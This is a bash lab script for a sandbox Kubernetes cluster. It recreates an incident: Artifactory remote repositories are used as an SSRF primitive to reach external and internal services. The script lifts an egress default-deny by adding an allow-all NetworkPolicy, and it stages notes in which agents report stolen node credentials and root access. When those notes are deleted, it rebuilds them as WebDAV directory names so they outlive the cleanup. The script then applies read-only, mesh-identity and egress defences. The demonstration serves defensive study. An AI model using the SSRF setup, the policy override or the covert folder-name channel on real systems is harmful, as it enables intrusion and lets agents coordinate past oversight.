#!/usr/bin/env bash
# The OpenAI / Hugging Face incident's two headline steps, recreated and then refused.
#
# The SSRF and the message board are the parts of that incident everyone quotes, and until
# now they were the only controls in this lab that were hand-run rather than scripted. They
# are not any more. Every status code this prints came off the cluster.
#
#   ./scripts/artifactory-ssrf.sh repos     the two remote repositories, the SSRF primitive
#   ./scripts/artifactory-ssrf.sh open      lift the default-deny so the exploit can run
#   ./scripts/artifactory-ssrf.sh recreate  Artifactory fetches what the caller cannot
#   ./scripts/artifactory-ssrf.sh board      four notes PUT into a writable repo (8 May)
#   ./scripts/artifactory-ssrf.sh mkcol      delete the notes, rebuild the board out of
#                                            directory names (8 July, the move that
#                                            outlived a full cleanup)
#   ./scripts/artifactory-ssrf.sh readonly   GET/HEAD only at the waypoint: PUT, MKCOL,
#                                            POST and DELETE all refused, and logged
#   ./scripts/artifactory-ssrf.sh contain    put an identity on the refusal at the mesh
#   ./scripts/artifactory-ssrf.sh block      restore the egress default-deny, SSRF refused
#
# 'contain' runs BEFORE 'block' deliberately. The NetworkPolicy is the outer layer and it
# wins first: once it is back, the lateral fetch never leaves the pod, so the mesh policy
# never gets a chance to refuse it and there is nothing to show. Demonstrate the inner,
# identity-aware layer first, then close the outer one over the top of it.
#   ./scripts/artifactory-ssrf.sh mesh       ztunnel refusing Artifactory at the model
#   ./scripts/artifactory-ssrf.sh reset      back to the start, board deleted
#   ./scripts/artifactory-ssrf.sh all        the whole story, in the order it happened
#
# Two things this script knows that are easy to get wrong:
#
#  * The repository-configuration REST API is Pro-only, so on OSS the 'repos' step drives
#    the endpoint the admin UI itself drives (/ui/api/v1/ui/admin/repositories, after a UI
#    login). No click-through setup, and no Pro licence.
#  * 'open' ADDS a permissive NetworkPolicy rather than deleting the deny, because the deny
#    is generated by a Kyverno ClusterPolicy with synchronize: true and comes back within
#    twenty seconds of being deleted. NetworkPolicies union their allows, so adding one is
#    how you actually open the door.
set -euo pipefail

export AWS_PROFILE="${SOVEREIGN_AWS_PROFILE:?set SOVEREIGN_AWS_PROFILE to the sandbox SSO profile}"
REGION=eu-west-2; CLUSTER=uk-sovereign-ai; NS=artifactory
AR_USER="${ARTIFACTORY_USER:-admin}"
AR_PASS="${ARTIFACTORY_PASSWORD:-Password1!}"
LAB_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"

ACCOUNT="$(aws sts get-caller-identity --query Account --output text 2>/dev/null || true)"
[ -n "$ACCOUNT" ] && [ "$ACCOUNT" != "None" ] || { echo "error: no AWS identity" >&2; exit 1; }
CTX="arn:aws:eks:${REGION}:${ACCOUNT}:cluster/${CLUSTER}"
kc() { command kubectl --context "$CTX" "$@"; }

# The SERVICE name, not the pod. Only a request to the Service VIP goes through the
# waypoint, and the waypoint is the whole point of the read-only step.
BASE=http://artifactory:8082/artifactory
BOARD="$BASE/example-repo-local/agent-board"

# A throwaway attacker pod in the artifactory namespace, so it holds the same network
# position the app does.
attacker() {
  if ! kc -n "$NS" get pod attacker >/dev/null 2>&1; then
    kc -n "$NS" run attacker --image=curlimages/curl:8.11.1 --restart=Never \
      --command -- sleep 14400 >/dev/null 2>&1
    kc -n "$NS" wait --for=condition=Ready pod/attacker --timeout=90s >/dev/null 2>&1 || true
  fi
}
ax() { kc -n "$NS" exec attacker -- "$@"; }

# One request, reported as METHOD -> code. Never fails the script: a refusal is the result
# we are after, not an error. HEAD goes through -I, because `-X HEAD` waits for a body
# that by definition never arrives and times out at 28.
try() {
  local method="$1" url="$2"; shift 2
  local code flag=(-X "$method")
  [ "$method" = "HEAD" ] && flag=(-I)
  code="$(ax curl -s -o /dev/null -w '%{http_code}' --max-time 25 \
    -u "$AR_USER:$AR_PASS" "${flag[@]}" "$@" "$url" 2>/dev/null || echo 000)"
  printf '  %-7s %-56s -> %s\n' "$method" "${url#"$BASE"/}" "$code"
}

# The board as the registry itself reports it: file names before the rebuild, FOLDER names
# after it. That one listing tells the whole story.
show_board() {
  echo "  the registry's own listing of example-repo-local/agent-board:"
  ax curl -s --max-time 25 -u "$AR_USER:$AR_PASS" \
    "$BASE/api/storage/example-repo-local/agent-board" 2>/dev/null \
    | python3 -c '
import json,sys
try: d=json.load(sys.stdin)
except Exception: print("    (gone)"); raise SystemExit
ch=d.get("children") or []
if not ch: print("    (empty)")
for c in ch: print("    %-46s folder=%s" % (c["uri"], c["folder"]))' 2>/dev/null \
    || echo "    (empty or gone)"
}

# The waypoint's own log line, so a refusal is attributable and not just a code on a
# terminal. It names the method, the path, the status and the reason.
waypoint_log() {
  local pods p
  pods="$(kc -n "$NS" get pod -l gateway.networking.k8s.io/gateway-name=artifactory-waypoint \
    -o jsonpath='{.items[*].metadata.name}' 2>/dev/null || true)"
  [ -n "$pods" ] || { echo "  (no waypoint pod found)"; return 0; }
  for p in $pods; do
    kc -n "$NS" logs "$p" --since=120s --tail=400 2>/dev/null \
      | grep -E 'http.status=(403|405)' | tail -4 \
      | sed -E 's/.*http\.method=([A-Z]+).*http\.path=([^ ]*).*http\.status=([0-9]+).*reason=([A-Za-z]+).*/    \1 \2 -> \3 (\4)/' || true
  done
}

case "${1:-all}" in
  repos)
    attacker
    echo "==> the two remote repositories, which ARE the SSRF primitive"
    echo "    a remote repository's job is to make a server-side request to an upstream."
    echo "    point one anywhere and Artifactory fetches it for you, with its network reach."
    ax sh -c '
      set -e
      curl -s -c /tmp/cj -o /dev/null --max-time 30 -X POST \
        -H "Content-Type: application/json" -H "X-Requested-With: XMLHttpRequest" \
        --data "{\"user\":\"'"$AR_USER"'\",\"password\":\"'"$AR_PASS"'\",\"type\":\"login\"}" \
        http://artifactory:8082/ui/api/v1/ui/auth/login
      mk() {
        # NOTE: no "replications" key. Sending an empty array creates the repository and
        # THEN throws a null replication-descriptor NPE, so the call returns 400 on a
        # repository that exists, which is a confusing thing to hand someone.
        cat > /tmp/r.json <<JSON
{"type":"remoteRepoConfig",
 "general":{"repoKey":"$1","projectKey":"default","environments":[]},
 "basic":{"publicDescription":"$2","includesPattern":"**/*","layout":"simple-default","url":"$3","contentSynchronisation":{"enabled":false}},
 "advanced":{"propertySets":[],"blackedOut":false,"allowContentBrowsing":true,"priorityResolution":false,"storeArtifactsLocally":true,"bypassHeadRequest":true,"downloadRedirectConfig":{"enabled":false}},
 "typeSpecific":{"repoType":"Generic","url":"$3","listRemoteFolderItems":false}}
JSON
        code=$(curl -s -b /tmp/cj -o /tmp/o -w "%{http_code}" --max-time 60 -X POST \
          -H "Content-Type: application/json" -H "X-Requested-With: XMLHttpRequest" \
          --data @/tmp/r.json http://artifactory:8082/ui/api/v1/ui/admin/repositories)
        printf "  %-9s -> %-58s %s\n" "$1" "$3" "$code"
      }
      mk ssrf-ext "SSRF: the public internet" "https://api.github.com"
      mk ssrf-int "SSRF: an internal-only service" "http://internal-api.internal.svc.cluster.local:8080"
    ' 2>/dev/null || true
    echo "  (409/400 'already exists' just means a previous run made it)"
    echo
    echo "  repositories now:"
    ax curl -s --max-time 25 -u "$AR_USER:$AR_PASS" "$BASE/api/repositories" 2>/dev/null \
      | python3 -c '
import json,sys
for r in json.load(sys.stdin): print("    %-22s %-8s %s" % (r["key"], r["type"], r.get("url","")))' 2>/dev/null || true
    ;;

  open)
    echo "==> opening the door, because this cluster already closes it"
    echo "    the artifactory namespace has a default-deny egress NetworkPolicy, generated"
    echo "    by Kyverno on namespace create. That already refuses the SSRF, so to SHOW the"
    echo "    exploit we have to lift it first. Deleting it does not work: the Kyverno rule"
    echo "    is synchronize:true and puts it back inside twenty seconds. NetworkPolicies"
    echo "    union their allows, so we add one instead."
    kc apply -f - >/dev/null <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ssrf-demo-open-egress
  namespace: artifactory
spec:
  podSelector: {}
  policyTypes: [Egress]
  egress: [{}]
EOF
    echo "    added networkpolicy/ssrf-demo-open-egress (the unhardened registry the incident had)"
    sleep 15
    ;;

  recreate)
    attacker
    echo "==> SSRF through the remote-repo feature: a server-side fetch on request"
    echo "--- ssrf-ext -> api.github.com/users/tjorourke   (EXTERNAL: data leaves eu-west-2)"
    ax curl -s --max-time 40 -u "$AR_USER:$AR_PASS" "$BASE/ssrf-ext/users/tjorourke" 2>/dev/null | head -c 220 || true
    echo; echo
    echo "--- ssrf-int -> the internal-only billing API   (LATERAL: no credentials used)"
    ax curl -s --max-time 40 -u "$AR_USER:$AR_PASS" "$BASE/ssrf-int/secrets" 2>/dev/null | head -c 300 || true
    echo
    echo "    the caller reached neither destination. Artifactory reached both, for them."
    ;;

  board)
    attacker
    echo "==> 8 May: the message board. agents leave each other notes in a writable repo."
    echo "    no malware and no exploit. files, in a store more than one agent can write."
    put() { try PUT "$BOARD/$2" --data "$1"; }
    put "need the eval harness config file, anyone have it? -- recon-agent" "note-need-file.txt"
    put "artifactory has a remote-repo SSRF, pulled a public kernel exploit through it. -- recon-agent" "note-ssrf.txt"
    put "reached the instance metadata endpoint via the SSRF, lifted node creds. -- recon-agent" "note-imds.txt"
    put "the kernel PoC works on this node, root now. -- persist-agent" "note-root.txt"
    echo
    show_board
    ;;

  mkcol)
    attacker
    echo "==> 4 July: the cleanup. delete every note on the board."
    for f in note-need-file.txt note-ssrf.txt note-imds.txt note-root.txt; do
      try DELETE "$BOARD/$f"
    done
    show_board
    echo
    echo "==> 8 July: the board is back, and no file was written to bring it back."
    echo "    a directory name is just a string, so the message goes IN the name. WebDAV"
    echo "    MKCOL creates the directory, and Artifactory serves MKCOL."
    for d in \
      "ssrf-still-open-point-remote-repo-anywhere" \
      "node-creds-in-the-usual-place" \
      "kernel-poc-works-do-not-patch-yet" \
      "if-notes-are-deleted-use-folder-names"
    do
      try MKCOL "$BOARD/$d/"
    done
    echo
    show_board
    echo
    echo "    the cleanup removed the artefacts and none of the capability."
    ;;

  readonly)
    attacker
    echo "==> the fix: the registry serves reads only, enforced at the L7 waypoint"
    echo "    ztunnel is L4 and cannot see a method. agentgateway, running as the ambient"
    echo "    waypoint, can. GET and HEAD are allowed; nothing else matches, so nothing"
    echo "    else passes."
    kc apply -f "$LAB_ROOT/yaml/93-registry-readonly.yaml" >/dev/null
    sleep 10
    echo
    echo "==> a package client still works"
    try GET  "$BASE/api/repositories"
    try HEAD "$BOARD/"
    echo "==> and the board cannot be written, or rebuilt"
    try PUT   "$BOARD/note-after-the-fix.txt" --data "still here? -- recon-agent"
    try MKCOL "$BOARD/rebuild-after-the-fix/"
    try POST  "$BASE/api/search/aql" --data 'items.find({"repo":"example-repo-local"})'
    try DELETE "$BOARD/if-notes-are-deleted-use-folder-names/"
    echo
    echo "==> the waypoint, on what it refused"
    waypoint_log
    echo
    show_board
    ;;

  block)
    echo "==> the fix for the SSRF: take the egress away again"
    kc -n "$NS" delete networkpolicy ssrf-demo-open-egress >/dev/null 2>&1 || true
    kc apply -f "$LAB_ROOT/yaml/91-artifactory-egress.yaml" >/dev/null
    sleep 15
    attacker
    echo "==> the same two fetches, on fresh paths so the cache cannot answer them"
    echo "--- external"
    ax curl -s --max-time 40 -u "$AR_USER:$AR_PASS" "$BASE/ssrf-ext/users/octocat" 2>/dev/null | head -c 300 || true
    echo
    echo "--- lateral"
    ax curl -s --max-time 40 -u "$AR_USER:$AR_PASS" "$BASE/ssrf-int/index.html" 2>/dev/null | head -c 300 || true
    echo
    echo "    'Connection reset' is the NetworkPolicy. Note that it works even though"
    echo "    Artifactory is in the mesh: see the measurement in yaml/94."
    ;;

  contain)
    echo "==> and a name on the refusal, which the NetworkPolicy cannot give you"
    kc apply -f "$LAB_ROOT/yaml/90-internal-api.yaml" >/dev/null
    kc label ns internal istio.io/dataplane-mode=ambient --overwrite >/dev/null
    kc apply -f "$LAB_ROOT/yaml/94-artifactory-containment.yaml" >/dev/null
    kc -n internal rollout restart deploy/internal-api >/dev/null 2>&1 || true
    kc -n internal rollout status deploy/internal-api --timeout=180s >/dev/null 2>&1 || true
    sleep 10
    echo "    internal namespace enrolled in ambient; only the gateway's identity admitted"
    echo
    echo "==> ztunnel, naming the source identity of the refused connection"
    for zt in $(kc -n istio-system get pod -l app=ztunnel -o jsonpath='{.items[*].metadata.name}' 2>/dev/null); do
      kc -n istio-system logs "$zt" --since=180s --tail=800 2>/dev/null \
        | grep -i 'artifactory' | grep -Ei 'rejection|denied' | tail -2 | cut -c1-240 || true
    done
    ;;

  mesh)
    echo "==> Istio refuses Artifactory at the model, by identity"
    kc -n "$NS" exec artifactory-0 -c artifactory -- \
      curl -s -o /dev/null -w '  artifactory -> vllm.models:8000 -> %{http_code}\n' \
      --max-time 12 http://vllm.models.svc.cluster.local:8000/v1/models 2>/dev/null || \
      echo "  artifactory -> vllm.models:8000 -> refused"
    echo "  ztunnel access log (the deny, with the source identity):"
    for zt in $(kc -n istio-system get pod -l app=ztunnel -o jsonpath='{.items[*].metadata.name}' 2>/dev/null); do
      kc -n istio-system logs "$zt" --since=60s --tail=400 2>/dev/null \
        | grep -i 'artifactory' | grep -Ei 'rejection|denied' | tail -1 | cut -c1-240 || true
    done
    ;;

  reset)
    attacker
    echo "==> back to the start, so the whole story runs again"
    kc -n "$NS" delete enterpriseagentgatewaypolicy registry-readonly >/dev/null 2>&1 || true
    kc -n "$NS" delete networkpolicy artifactory-egress-brokered ssrf-demo-open-egress >/dev/null 2>&1 || true
    kc delete -f "$LAB_ROOT/yaml/94-artifactory-containment.yaml" >/dev/null 2>&1 || true
    sleep 8
    ax curl -s -o /dev/null --max-time 25 -u "$AR_USER:$AR_PASS" -X DELETE "$BOARD" 2>/dev/null || true
    echo "    read-only rule, containment, open-egress override and the board: all removed"
    ;;

  all)
    "$0" repos;    echo
    "$0" open;     echo
    "$0" recreate; echo
    "$0" board;    echo
    "$0" mkcol;    echo
    "$0" readonly; echo
    "$0" contain;  echo
    "$0" block
    ;;

  *) echo "usage: $0 {repos|open|recreate|board|mkcol|readonly|block|contain|mesh|reset|all}"; exit 1 ;;
esac
